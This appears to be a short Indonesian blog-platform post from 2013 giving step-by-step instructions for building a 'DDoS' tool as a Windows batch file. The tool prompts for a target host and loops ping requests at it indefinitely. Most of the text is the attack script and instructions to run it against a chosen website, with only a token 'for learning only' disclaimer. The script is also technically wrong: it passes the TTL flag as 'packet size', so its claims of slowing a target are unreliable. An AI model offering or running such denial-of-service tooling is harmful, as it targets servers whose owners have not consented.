Membuat DDoS sederhana

308 0 0
                                    

Cara membuat Tool DDOS sederhana menggunakan notepad :

1. buka notepad lalu copas kode berikut ini 

@echo off

mode 67,16

title DDOS Attack

color 0a

cls

echo.

echo DDOS With Batchfile

echo.

set /p x=Server-Target:

echo.

ping %x%

@ping.exe 127.0.0.1 -n 5 -w 1000 > nul

goto Next

:Next

echo.

echo.

echo.

set /p m=ip Host:

echo.

set /p n=Packet Size:

echo.

:DDOS

color 0c

echo Attacking Server %m%

ping %m% -i %n% -t >nul

goto DDOS

2. save as notepad dengan nama DDoS.bat save as type all files lalu save.

3. untuk penggunaan klik open file tadi

4. setelah muncul silahkan masukan web target yg ingin di DDoS

serangan sederhana ini dan dilakukan secara berulang-ulang, web target akan sedikit lambat jika kita akses. Tutorial ini hanya untuk pembelajaran, jadi jangan disalahgunakan ya 

You've reached the end of published parts.

⏰ Last updated: Jun 27, 2013 ⏰

Add this story to your Library to get notified about new parts!

Membuat DDoS sederhanaWhere stories live. Discover now